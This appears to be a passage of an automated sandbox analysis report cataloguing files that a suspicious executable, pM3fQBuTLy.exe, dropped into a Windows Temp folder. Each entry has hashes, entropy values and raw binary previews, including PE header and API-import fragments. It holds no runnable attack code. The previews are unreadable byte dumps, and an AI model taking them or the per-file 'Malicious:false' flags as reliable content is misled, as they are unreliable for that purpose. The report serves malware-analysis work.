                                                                                                                                                                                                                                                                                          Preview:.I........G......7_^3.[......$.I.=3'..u.j...t...........PV.\.......}.....V..(.I.....U....SV.u...W.E......~..v..F..H.......E..V..2..z..'r...v.......PV.E..P.......u..u............F..........j.j.j.....I......u0..$.I....Q..|....L..t..I8.A..|....D..t..@8.@...j..E.PW....I....u:..$.I....Q..|....L..t..I8.A..|....D..t..@8W.@....(.I..X....u.W....I...t8..$.I....Q..|....L..t..I8.A..|....D..t..@8W.@....(.I.....u.........F......>_^3.[....U...$VW...M..&....E..@..0....p...N..U.......u.....I...u=..$.I....Q..|:...L:.t..I8.A..|:...D:.t..@8.M.h..I..@....M...L.@.j..0.E.P.L.......u.....I.P.M......M.......U.M.......M..E.P.\...M.......M......_3.^....U...0...SVW.}...G........W...]..J......M...h..I..9M.....u....H..|1...D1.t..@8.H...|1...D1.t..@8.@...!...j...t...........PS.............G.P.V...YP.M...#...].j.WS.u.....I..............tw.E..x..r..@..H..+.....uIS..;..q..Y;.u:S.M...#...M......U.M.......M..E.P.}[...M......M......V.M.WSW....P.........@..j.j..H....[......$.I....I..|1...T1.t..R8.B

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Passed

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:mc68k COFF object not stripped
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):115712
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.305765001798793
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:Rg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laWp:C5vPeDkjGgQaE/lv
                                                                                                                                                                                                                                                                                          MD5:360AA1E66E6B54F55870A854C57D17DE
                                                                                                                                                                                                                                                                                          SHA1:D1F4B1E951AEB774487983565F2EB7E1B320DA49
                                                                                                                                                                                                                                                                                          SHA-256:BADD5B966D1888801A484DECA56CB13F37DAC381038EE7FEFEADBEB91E0184D6
                                                                                                                                                                                                                                                                                          SHA-512:084ECB5BD4816DC2CCD906B60EA85E332A7C6F5012C865C9801A7BD32032D0EFFB4F847A7996C2C63E230BB16110844B78AE48D07376B5506FCE6A0D1796E422
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Pink

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2065
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.059559666516752
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:To9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1d:TUSEA5O5W+MfH5Sf
                                                                                                                                                                                                                                                                                          MD5:ABA3CF6C366C78F24CA62C221C7CFE71
                                                                                                                                                                                                                                                                                          SHA1:1A5EA559822F4C546C8E18699D91B433AF459032
                                                                                                                                                                                                                                                                                          SHA-256:B04A670272CA3DE5D350F1D226A81096242838ABCBB13E4D2D3B6B20FB08AF46
                                                                                                                                                                                                                                                                                          SHA-512:F34715DA13FFBB57A04C598517FE5B0BB2241982F5C6FDEE428F1811D3F97BB875B02AE07A3D4478A5023C3BFA60C040BCE66DDBE04C2C2363B9407D722915FD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Grocery........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Prevention

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):38430
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.994669811081336
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:CT4OQezCkwQuqaOfdlmFdLM9KNI/59Z+zNDfU83tSmb9b+/gz/Xf8Of1vf:O4OL2k5uq7fWdbNeDYisRb9iivLf9
                                                                                                                                                                                                                                                                                          MD5:B96D763EA6110AA1D3C64359938B44F7
                                                                                                                                                                                                                                                                                          SHA1:37D15B9A55C87F4C517FDFBADBD194188EB968DA
                                                                                                                                                                                                                                                                                          SHA-256:5FE4A820A45FA2A264C6196D7ABE33BA2B045FC38EE441EECA05D0EBE67F8EA4
                                                                                                                                                                                                                                                                                          SHA-512:A01B0E6EF1E6899189783331A597F7DC8EE3A89C19520B6FBADD6A018E3FB5A2F13E6C4341D2543805879C1712AA59FD94EA2901DF6A18547D5C1ACBEBDB4C8A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...k+..R.6l...P..C....=.#....B$Zb.,.....e...,q=..9.Q..w._"aP}p.*..>....>..N5-@.b,....4..y{.\5......YN&.....2....9!;.]F.!.v..?.OV.)...V..'..B..;.2....j.......q.M7.........V..j.&.(.Q_D-yw-.A..R....;}.c0F.D....f..@nM9Z.....`.....|.k$..c..9.Q.G?.b..0....Y.,....<....X.g..?......KI...{o..i..[R.q......C.W.g.bu..r.n....pmP...".=....].......P.......;.ex...P..Z3...(/.*...nW.S_.M....7.z.\..~;?........#..n...........5..e.Z.e.;`H7.S$.K..lp..R{{....-.E%.e...S..K......S..}..].".sd.Z....p..I.s&...\b.'........t...'&.T.Q*..;[.jlE....g.6....{2.hq.x...2..B...5....<x.7..=..e.u]..a.<.<I.'^. ..~..]$...4...Ds|.w4.v.p..Vp.>...>B.b..."..Qv.Q....DsG...C....(Z5a.o..I....Z..lSM.Z..."X.G.|&..C.9..=)e..h...TE.u...G..o.U..\......{..u..K.rPj...H..8-. .4.P.|.d(...y>.A..=$..[.m.......e.*bM.nw..R8M...t...m<....{qR.H.s....]..7....r....;..TkV.#%.\?..M8..e..X.}..L.bi.e\...f'.w..e..[.{.`.'......)...b..&..5=....,.....p.G:...... .D......X.{..O......#....`Z@.@.{.;.].

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Releases

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):94208
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.173189808004457
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:9ex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVs:0dKaj6iTcPAsAhxd
                                                                                                                                                                                                                                                                                          MD5:1CA1EC5F52E0566A26A5B08A8289BC4E
                                                                                                                                                                                                                                                                                          SHA1:452123CDAF3C15A33D2B79C2C4FA593CB06BDE07
                                                                                                                                                                                                                                                                                          SHA-256:F3ABFE122D327BFF9E86B7EEC1B6458873E3E959CC3744471DAAD2B1CD6F89B9
                                                                                                                                                                                                                                                                                          SHA-512:9315113775FF4EFE9C08E2845CF806CBE9F67DB63051553BC7EEFE71FC763615DF955C2E7E9FAAEBF7F06F31B9C2C93408575DC460D0EB8BD46207E326C37F9B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:r.r.r.r.......r.................r.r.....r.r.............................................r...............r.....r...........r.r...................r.r.....r.r.......r.r.r.r.r.r.r.r.....r.r.r.r.....r...........r.r.....................................r.r.r.r.r.r.r.r.r.r.....r.............r.r.r.......r.........r.r.r.....r...r.....r.r.r.....r.r.r.......r.r.r.........................r.r.r.r...........r.r.r.......r.........r.r...r.r.r.r.r.r...r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................................r.r.r.r.r.........r.................r.......r...............................................r.................................r.r.r.................r.......r.........r.r.r.r.r.r.r.....r.....r.r.r.r.r.r.........r.r.....................r.r.r.r.r.r.r.r.................r.......r.................r.......r...............................................r.....................r...........r.r...................r.......r.........r.r.r.r.r.r.r.....r.r.r.r.r.r.r...r.........r.r.....................r.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Reviewed

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):56320
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.476989031419292
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:DQsbZgar3R/OWel3EYr8qcDP8WBosd0bF:BgarB/5el3EYrDWyu0J
                                                                                                                                                                                                                                                                                          MD5:EF6913C248AD6A006257F60C269D4DA2
                                                                                                                                                                                                                                                                                          SHA1:CDB931970C1DB6D902E8BDD1C1594382F8B9163D
                                                                                                                                                                                                                                                                                          SHA-256:819A2226EDEA2E77621A308CD7F914E934E95B174888C20AD6D651286368B7FE
                                                                                                                                                                                                                                                                                          SHA-512:F9FCA1EF5C7411C56DC6E495F18E404BBC1104AF445BAEDDD3A8DB0ABF03B0337B72F2C3644AEDC7D5293F9AD2D274DB2A139CEE7668D3D792D8D0991387C525
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ingW....EnterCriticalSection..9.LeaveCriticalSection..d.GetStdHandle....CreatePipe....InterlockedExchange...TerminateThread.>.LoadLibraryExW..M.FindResourceExW.u.CopyFileW...VirtualFree.^.FormatMessageW....GetExitCodeProcess..B.GetPrivateProfileStringW..+.WritePrivateProfileStringW..@.GetPrivateProfileSectionW.).WritePrivateProfileSectionW.?.GetPrivateProfileSectionNamesW..$.FileTimeToLocalFileTime.%.FileTimeToSystemTime....SystemTimeToFileTime..F.LocalFileTimeToFileTime...GetDriveTypeW...GetDiskFreeSpaceExW...GetDiskFreeSpaceW...GetVolumeInformationW...SetVolumeLabelW...CreateHardLinkW.a.SetFileAttributesW....CreateEventW..Y.SetEvent....GetEnvironmentVariableW.W.SetEnvironmentVariableW...GlobalLock....GlobalUnlock....GlobalAlloc...GetFileSize...GlobalFree....GlobalMemoryStatusEx..6.Beep..p.GetSystemDirectoryW...HeapReAlloc...HeapSize....GetComputerNameW....GetWindowsDirectoryW....GetCurrentProcessId.N.GetProcessIoCounters....CreateProcessW..L.GetProcessId..}.SetPriorityClass..?.LoadLi

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Through

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):55296
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99687182989199
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:mP67Y2FXAHBj01TRYO3+S2E32RnP/TQfG:i3WXiNgRYS+SDGRP7J
                                                                                                                                                                                                                                                                                          MD5:D926E95778EB9F36D2159D72FFF165D1
                                                                                                                                                                                                                                                                                          SHA1:06361BAA26A36BFCE0D2474E6F17D7764E2B82CF
                                                                                                                                                                                                                                                                                          SHA-256:088427CEE6743E6E79165CDC27C83EB9BE81DE9E0D9D8C47BCF31E87A320488E
                                                                                                                                                                                                                                                                                          SHA-512:133202D73CD2B007CE243B66073A3A0393F7DA479062C88572652E30D4488AB2CE4EB8A2FF4F697FAE0CF6B60FD96004EE0EF2DA02C5DB8653765F1B373057B2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.....'}g.&....w...l./....}..%...Q.4u..ts...Q..|.+.SVp.0:%..>...a}1.....'.q?!...m...y\...:...5%..g...}n.+]...?t.{-.....O<......KQ....SS...0N.0..=...O..b._...c....7....'.6{r.l.......i.1.uP.'t..0..N.....k..|..?......z./..CS.2.<..&~....r.`......z+....5....Z...kLp.[R...Yf.w%.......8.o....I.... .D..\`...'-.Ux....7..l...S*.T.IMy......H.`.f.....7.NX..s.q.4.[Z..{7.N..{..aYI..5......c4..C..K]..7..D..TV.b..ffI..>.3..7/..WU[|....c..b'?...l.m.n.........z)].(.T_p.z.v..F..;..n......P......_.}....QH.9".I(..Rtl..F...ca..d.m.Eq...CS.M....#.m..].n.XA...B<m}..=.qO./.....>.a.Xx~.....T.,x}j'.v?n........Ra.........-.....Q......C..7.c#IX......8ak.A.^....N?t..)... m.3.._W.^w...x\...*..............t8q.Q.@..7...;........$..#M..Q..szy...JW.....0...*....U..p.....A...hG...}..w..k....`.f.$e.u#.d....3...N.D...J..$...%...hg.......S.Z.X[?.j......@...:.D.<'.......cy..*|`.19w...)p..z..p..=......*..........UL....z.w*..MO.c#E.[{..en.>[f.5q....<..c.Y.A6...'.Q\-P.=0..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Trials

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\pM3fQBuTLy.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):64590
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.907250441230872
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:gZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:gZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                                          MD5:5D1BD27CCE0D4269EFE798E0AF842995
                                                                                                                                                                                                                                                                                          SHA1:B7415487A4F21361B39BE2E9482E36CE8A7CDED3
                                                                                                                                                                                                                                                                                          SHA-256:3309D29AD35AF3FC0930FB1C33ED14B7DD7B6B9079FAF2A241C87EF762D11CA4
                                                                                                                                                                                                                                                                                          SHA-512:A98425819B20A89236DCBD2D72B59FA6D1DCA79E40E20CEB0134DFB7AFC021C04E92FB978BD6B70B373589B47F95A956BC975AA73D50BFD234DA4D2B39012EBF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...#Y.Y.....^~k..U..Z.\W....a.+S..OF....J.tv....M...h.'...h.,.!.|....:..gbN..'j....`RU'....9Xy...s|o7...j....[...:..j?........Sb<...h.8.>gj:.-v....L&g........]qG:.|...N...v...V..."_;uk..~..I.9.........31...E...G...d....8..\...$....F`<.$..o..4.]=.....E92U......M....x..G{......}..N3..+.g.mNI..k6...@U.P....1 .3..o.}{4..3t.[]M.....6......6].mM.g.....x|...u..5D..t...X........[.........u'.6m'..qx....)...VM..fXY.\......].F.RM9.n+./.....Bu.....I8.....j6~g.H.R..i.."."B*......XL.:......H.rk.|~......{.....-..6..~..F2...x.;..3..DmJ.8].q.-..m...M.P....M......F.n.VW.../....Dv.Q.T,.}=t.|.....?O..{......N...@.f...*...........Q:......G..7.r..b.r~.o.1~O]~?.. {....W..'.......T.....S...m.........H.%..;..|..C.>..vurdW..;.*7g.|n......&..uqpg....!......o.5...=L.C..U..t:..J.w.j...|./*....7..[..V....m..I.1...j.X....i&..7.....3q.....#..X+.h....Z..u.l?~.N.xG.0..eU..2.....0.H..j.....za...g]] ......=.@Y^+.7'.j.&.e...sXk.-HoG...a..'.`.x..h...#.J_:..\.4..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\accc6d33-6abb-44df-94d4-d21d21165a23.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):206855
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                          MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                          SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                          SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                          SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\cb9c78a1-0d84-4db0-b198-ea8cf7ea71b6.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, comment: "Lavc59.36.100", baseline, precision 8, 1280x720, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1622621
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.993910527300594
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:24576:BMBOMZEgYhRtwFK58vE2RShdBqHuQlvu3TBLZSfNZLglYPEDFs6Udn1SaEAAPjLu:WdZAKKKvqUHvlvu3p4hPPJn1Hsnu
                                                                                                                                                                                                                                                                                          MD5:941ACBED2ECD50B4E501B45CDEF2721B
                                                                                                                                                                                                                                                                                          SHA1:E600C76B8FEC5DDC80DEF123F736F61D4DBC8B07
                                                                                                                                                                                                                                                                                          SHA-256:D97D64BCFC59910898B2C1225F8649C4631CC51B6384F5A4DBDA14EB925AEE37
                                                                                                                                                                                                                                                                                          SHA-512:AB3811CBAE22A42CDDC180316E101A3C457708E19E170EB68BB67AA9450D6925248F0E36FDB875D4C9878843275099785D7C01F3DF46653F634F483FF1036D0D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1420
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.409334140585766
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0Y35BMpXzl0iM8Gdxg5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5j
                                                                                                                                                                                                                                                                                          MD5:4AB13C5B3826DB3FFD7D1CC445907689
                                                                                                                                                                                                                                                                                          SHA1:E507EFB7D2B1CB8925C45ADD2F89FD840C7D05BB
                                                                                                                                                                                                                                                                                          SHA-256:6ABC9E3BFE4C88CBE2E5FEB951DC4ECD2EFE09975889A3FCA8C06B47A4C8E57C
                                                                                                                                                                                                                                                                                          SHA-512:959A301F86F256DC8FD21E50A3481EACC1EF6BBEC45DB4713A5AA42B1EA7020C73FF31C1A4B065201AE83477C1D0BFC01ED9A5D31E1181CD0B36C8FA3E410CB6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\eef5a1c8-cd0e-4a18-8f41-1d812bd2253f.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\167f53e1-11de-4c74-990c-6708a5a2c0df.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                          Malicious:false
